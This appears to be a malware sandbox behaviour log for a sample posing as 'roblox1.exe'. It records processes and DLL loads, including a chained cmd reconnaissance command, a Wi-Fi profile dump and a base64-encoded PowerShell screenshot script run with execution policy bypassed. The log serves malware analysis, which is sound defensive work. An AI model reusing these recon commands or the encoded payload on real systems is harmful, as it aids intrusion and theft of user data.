                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\systeminfo.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\HOSTNAME.EXE hostname
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net user
                  Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\query.exe query user
                  Source: C:\Windows\System32\query.exe | Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net localgroup
                  Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net localgroup administrators
                  Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net user guest
                  Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net user administrator
                  Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /svc
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc query type= service state= all
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show config
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA
                  Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: python310.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: libffi-7.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: sqlite3.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: python3.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: libcrypto-1_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: libssl-1_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
